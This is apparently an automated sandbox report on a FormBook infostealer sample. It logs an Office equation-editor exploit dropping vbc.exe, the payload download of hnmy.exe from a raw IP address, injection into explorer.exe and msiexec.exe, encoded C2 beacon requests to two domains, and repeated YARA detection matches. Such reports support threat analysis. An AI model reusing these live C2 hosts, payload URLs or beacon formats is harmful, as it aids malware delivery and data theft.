            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmpString found in binary or memory: http://sogou.9898top1.com/sscx.html
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.pir
            Source: explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_la
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emfJump to behavior
            Source: unknownDNS traffic detected: queries for: www.aloebiotics.com
            Source: global trafficHTTP traffic detected: GET /hnmy.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 209.141.37.110Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.aloebiotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.sjljtzsls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00432A4F GetKeyState,GetKeyState,GetKeyState,GetKeyState,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00435DBA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeJump to dropped file
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440688
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00435148
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042C38B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00431940
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00429BA4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C8C5
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8F3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C134
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D2AE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C8B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF5F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0078905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00773040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0079D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0076E0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0076E2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00811238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007BA37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00777353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008163BF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00772305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007963DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0076F3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007AD47D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007F443E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00781489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007A5485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007B6540
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0077351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0078C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007BA634
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00812622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0077E6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00774680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007A57C3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0077C7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007F579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0079286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0077C85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0080F8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0081098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007F5955
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007F394B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007869FE
